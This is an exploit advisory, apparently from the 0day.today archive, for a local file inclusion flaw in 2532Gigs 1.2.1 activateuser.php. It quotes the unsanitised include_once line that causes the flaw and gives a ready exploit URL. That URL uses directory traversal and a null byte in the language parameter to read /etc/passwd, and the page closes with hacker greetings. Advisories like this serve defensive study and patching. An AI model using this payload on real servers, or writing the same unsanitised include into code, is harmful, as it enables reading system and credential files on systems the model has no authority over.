2532|Gigs 1.2.1 (activateuser.php) Local File Inclusion Vulnerability

🗓️ 26 Aug 2007 00:00:00Reported by bd0rkType

zdt🔗 0day.today👁 28 Views

Gigs 1.2.1 activateuser.php Local File Inclusion Vulnerabilit

=====================================================================
2532|Gigs 1.2.1 (activateuser.php) Local File Inclusion Vulnerability
=====================================================================



            -?-?-?-?-?-?-?-?-?-?-?-?-?-?-?-?-?-?-?-?-?-?-?-?-?-?-?-?-?-?-?-?-?-?-?-?

             2532|Gigs 1.2.1 (activateuser.php) Local File Inclusion Vulnerability

                              Discovered by bd0rk || SOH-Crew

                         The german Coding and IT-Security Ressource

             -?-?-?-?-?-?-?-?-?-?-?-?-?-?-?-?-?-?-?-?-?-?-?-?-?-?-?-?-?-?-?-?-?-?-?-?


Vendor: http://www.2532gigs.com

Download: http://belnet.dl.sourceforge.net/sourceforge/gigs-2532/2532Gigs_1.2.1_stable.zip

License: Free

Vulnerable Code: include_once("languages/$language/settings.php");



Exploit: http://[h0sT]/[dir]/activateuser.php?language=../../../../../../../../etc/passwd%00



Greetings: str0ke, TheJT, GolD_M, die steffi, khaliDb, x0r_32


####The 18 years old, german Hacker bd0rk####



#  0day.today [2018-01-03]  #

26 Aug 2007 00:00Current

7.1High risk

Vulners AI Score7.1